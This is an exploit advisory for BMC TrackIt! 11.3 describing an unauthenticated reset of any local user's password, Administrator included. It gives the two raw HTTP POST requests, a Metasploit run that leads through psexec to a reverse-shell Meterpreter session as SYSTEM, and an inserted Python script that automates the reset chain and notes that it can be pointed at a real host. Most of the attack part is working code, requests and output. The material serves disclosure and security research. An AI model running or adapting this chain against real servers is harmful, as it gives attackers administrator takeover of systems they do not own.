BMC TrackIt! 11.3 Unauthenticated Local User Password Change

Posted Dec 11, 2014
Authored by Brandon Perry

BMC TrackIt! version 11.3 suffers from an unauthenticated local user password change vulnerability.

tags | exploit, local, bypass
SHA-256 | 5fefd8b05da0065be210ad2c623884f150fbcfc0f1be8ecb4ef3325bee6f4935

BMC TrackIt! 11.3 Unauthenticated Local User Password Change
Trial available here: http://www.trackit.com

A Metasploit pull request has been made here:
https://github.com/rapid7/metasploit-framework/pull/4359

BMC TrackIt! 11.3, when installed with TrackItWeb!, allows an unauthenticated
user to change the password of any local user on the server, including
Administrator. If remote logon over SMB is enabled on the server, this yields
an unauthenticated attacker a SYSTEM shell via the psexec module in
Metasploit. This was tested against Windows Server 2008 R2 in a relatively
default installation (TrackIt! installs SQL Server). A domain was set up and
the web server was joined to it; domain users' passwords could not be
changed, only local users'.

Using the Registration link in the top right of the
/PasswordReset/Application/Main page, the UI prompts for the user's password
before continuing. However, the request that actually registers the local
user is separate from the authentication request and can be sent on its own,
with no password at all. An unauthenticated user can therefore register any
local user with secret answers of their choosing. Likewise, the Password
Reset form checks the answers to the secret questions in one request and
changes the password in a second, distinct request, so the request that
actually changes the password can be sent directly for any registered user.

The first request looks like:

POST /PasswordReset/Application/Register HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset
Content-Length: 318
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd%40fdsafdsa.com&userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not

A valid ASP.NET_SessionId is required: issue a GET to /PasswordReset/ and
use the value from the Set-Cookie response header as the cookie in all
subsequent requests. The domainname parameter can be the name of the
computer, which is the default value on the registration page. The userName
parameter is the local user to register with the application. This works
without issue against a user who is already registered (though overwriting
that user's secret answers with known values is also bad).

The second request looks like this:

POST /PasswordReset/Application/ResetPassword HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset/Application/Main
Content-Length: 92
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true

The domain and UserName parameters must match those supplied in the
previous registration request. The newPassword parameter must satisfy the
local password policy (e.g. the complexity and minimum length rules
enforced by GPO).

Combining these two requests lets an unauthorised user register a local user
so that it becomes eligible for a password reset via the password reset
form, then abuse the separate password reset request to change the password
of any local user, including Administrator.
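The chain described above, as an added example (this is not the advisory's Metasploit module and not product code): a Python script that builds the two request bodies with the parameter names shown in the requests, bootstraps the ASP.NET_SessionId, then sends Register followed by ResetPassword. Since nothing can run against a real TrackIt! install offline, a constructed mock handler models the described flaw (both POSTs only require a session cookie; neither the password prompt nor the secret-answer check is enforced server-side) so the script can be exercised end to end. The email address, the WIN-TEST domain name and the mock's response codes are assumptions; generate_password draws from four character classes so the result meets the default Windows complexity rule referred to above.

```python
"""Two-request TrackIt! 11.3 local password reset chain (added example, not
the advisory's Metasploit module). Endpoints, parameter and cookie names
come from the advisory; the mock target is a constructed stand-in for the
described behaviour so the chain runs offline; real response codes are assumed."""
import http.client
import json
import secrets
import string
import threading
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode

REGISTER = "/PasswordReset/Application/Register"
RESET = "/PasswordReset/Application/ResetPassword"


def generate_password(length=12):
    """One char from each class satisfies the default Windows complexity
    rule (3 of 4 classes) and a sane minimum length, whatever GPO enforces."""
    pools = (string.ascii_uppercase, string.ascii_lowercase, string.digits, "!@#$%")
    chars = [secrets.choice(p) for p in pools]
    chars += [secrets.choice("".join(pools)) for _ in range(length - len(pools))]
    secrets.SystemRandom().shuffle(chars)
    return "".join(chars)


def register_body(domain, user, answers=("not", "not")):
    """Register POST body: enrols `user` with attacker-chosen secret answers,
    the step the UI gates behind the user's password but the server does not."""
    questions = [{"Id": i + 1, "Answer": a} for i, a in enumerate(answers)]
    params = [("domainname", domain), ("userName", user),
              ("emailaddress", "nobody@example.invalid"),  # constructed value
              ("userQuestions", json.dumps(questions, separators=(",", ":"))),
              ("updatequesChk", "false")]
    params += [("SelectedQuestion", str(q["Id"])) for q in questions]
    params += [("answer", a) for a in answers] + [("confirmanswer", a) for a in answers]
    return urlencode(params)


def reset_body(domain, user, new_password):
    """ResetPassword POST body; domain/UserName must match the Register call."""
    return urlencode([("newPassword", new_password), ("domain", domain),
                      ("UserName", user), ("CkbResetpassword", "true")])


def _post(conn, path, body, cookie):
    hdrs = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest", "Cookie": cookie}
    conn.request("POST", path, body, hdrs)
    resp = conn.getresponse()
    resp.read()
    return resp.status


def reset_local_password(host, port, domain, user, new_password):
    """Bootstrap a session, register the victim, then reset its password.
    Returns the status codes of the Register and ResetPassword requests."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", "/PasswordReset/")  # only needed to obtain a session id
    resp = conn.getresponse()
    resp.read()
    session = SimpleCookie(resp.getheader("Set-Cookie", ""))["ASP.NET_SessionId"].value
    cookie = "ASP.NET_SessionId=" + session
    st_reg = _post(conn, REGISTER, register_body(domain, user), cookie)
    st_rst = _post(conn, RESET, reset_body(domain, user, new_password),
                   cookie + "; UserName=" + user)  # second request adds the UserName cookie
    conn.close()
    return st_reg, st_rst


class VulnerableTrackIt(BaseHTTPRequestHandler):
    """Constructed mock of the flaw: both POSTs accept any caller holding a
    session id; the password prompt and the secret-answer check are never
    consulted server-side."""
    passwords = {"Administrator": "original"}  # stand-in for the local SAM
    registered = set()

    def do_GET(self):
        self.send_response(200)
        self.send_header("Set-Cookie", "ASP.NET_SessionId=" + secrets.token_hex(8))
        self.end_headers()

    def do_POST(self):
        form = parse_qs(self.rfile.read(int(self.headers["Content-Length"])).decode())
        user = (form.get("userName") or form.get("UserName") or [""])[0]
        if "ASP.NET_SessionId" not in SimpleCookie(self.headers.get("Cookie", "")) or not user:
            code = 403
        elif self.path == REGISTER:
            self.registered.add(user)
            code = 200
        elif self.path == RESET and user in self.registered:
            self.passwords[user] = form["newPassword"][0]
            code = 200
        else:
            code = 404
        self.send_response(code)
        self.end_headers()

    def log_message(self, *_):  # keep the mock quiet
        pass


def start_mock():
    """Serve the mock on an ephemeral loopback port in a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), VulnerableTrackIt)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv
```

To exercise it, call start_mock() and pass its server_port to reset_local_password("127.0.0.1", port, "WIN-TEST", "Administrator", generate_password()); afterwards VulnerableTrackIt.passwords["Administrator"] holds the new value. Against a real host the same function is pointed at the TrackIt! web server instead, with the computer name as the domain, which is what the module's TARGETURI of / corresponds to.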

Supplied is a Metasploit auxiliary module which changes the password of the
Administrator user by default, then prints the domain, username and new
password for use with psexec to log in over SMB.

The Metasploit run below shows the password being changed with the attached
module. With SMBPass set to the password reported by the auxiliary module,
psexec is then run and a shell as NT AUTHORITY\SYSTEM is obtained.


msf auxiliary(bmc_trackit_pwd_reset) > show options

Module options (auxiliary/gather/bmc_trackit_pwd_reset):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
DOMAIN                      no        The domain of the user. By default the local user's computer name will be autodetected
LOCALUSER  Administrator    yes       The local user to change password for
Proxies                     no        Use a proxy chain
RHOST      192.168.1.57     yes       The target address
RPORT      80               yes       The target port
TARGETURI  /                yes       The path to BMC TrackIt
VHOST                       no        HTTP server virtual host

msf auxiliary(bmc_trackit_pwd_reset) > run

[*] Please run the psexec module using:
[*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1
[*] Auxiliary module execution completed
msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec

msf exploit(psexec) >
msf exploit(psexec) > set SMBPass qGSvnJeuNO!1
SMBPass => qGSvnJeuNO!1
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \fNRBQEMV.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (NOAlMwJR - "MBvX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \fNRBQEMV.exe...
[*] Sending stage (769024 bytes) to 192.168.1.57
[*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668) at 2014-10-12 00:44:12 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

